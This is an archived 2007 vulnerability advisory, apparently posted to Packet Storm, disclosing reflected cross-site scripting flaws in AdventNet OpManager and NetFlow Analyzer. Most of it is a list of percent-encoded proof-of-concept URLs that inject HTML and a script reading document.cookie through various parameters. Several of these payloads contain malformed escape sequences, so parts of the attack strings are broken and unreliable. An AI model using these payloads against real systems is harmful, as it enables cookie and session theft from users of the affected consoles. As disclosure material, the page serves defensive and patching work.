what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

netflow-xss.txt

netflow-xss.txt
Posted Jul 7, 2007
Authored by Lostmon | Site lostmon.blogspot.com

The NetFlow Analyzer version 5 and the OpManager version 7 suffer from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 903687236cd10c8ffd7a15e78746a174fb05988d7562c1a2d88dab24ab95b07e
Download | Favorite | View

netflow-xss.txt

Change Mirror Download
###################################################
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
###################################################

NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.



#####################
Versions afected:
#####################

OpManager 7
OpManager 6

NetFlow Analizer 5

other versions can be vulnerables too


###################
Solution:
###################

No solutions was available at this time !!!




##################
Time Line
##################

Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:----
disclosure:4-07-2007

###################
Examples
###################

for exploit some flaws you need to login.


#####################
OpManager
#####################


http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E

http://localhost:8080/devices/Search.do?searchTerm=sss%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selectedTab=Map

http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil

http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil


http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter

http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation


http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations

http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E


#######################
NetFlow Analizer
#######################

http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1

http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E

http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true

#################### €nd ################################

Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close